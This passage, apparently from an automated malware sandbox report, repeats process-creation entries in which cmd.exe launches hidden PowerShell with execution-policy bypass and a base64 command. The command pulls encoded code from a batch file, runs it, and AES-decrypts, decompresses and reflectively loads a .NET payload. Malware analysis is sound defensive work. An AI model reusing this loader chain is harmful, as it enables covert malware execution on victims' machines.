gICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0l5cnlFVjRZOVMzVmdWU3FxQ2lpb0E9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHRkdXMoJHBhcmFtX3Zhcil7CSRrdHlxdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkamxwbmE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkb3hmZWk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgka3R5cXcsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJG94ZmVpLkNvcHlUbygkamxwbmEpOwkkb3hmZWkuRGlzcG9zZSgpOwkka3R5cXcuRGlzcG9zZSgpOwkkamxwbmEuRGlzcG9zZSgpOwkkamxwbmEuVG9BcnJheSgpO31mdW5jdGlvbiB2bWV1cCgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHVxZW1iPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskcGxwcWwgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJHBscHFsKSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRwbHBxbCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRwbHBxbCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkcGxwcWwiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gemR0Z3QoJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ3NYeGtuSGEzMEVib3gxcmd2YkdoYzJnRnpWQVlUY1hESE1sQmFSQ0x1cGM9Jyk7CSRhZXNf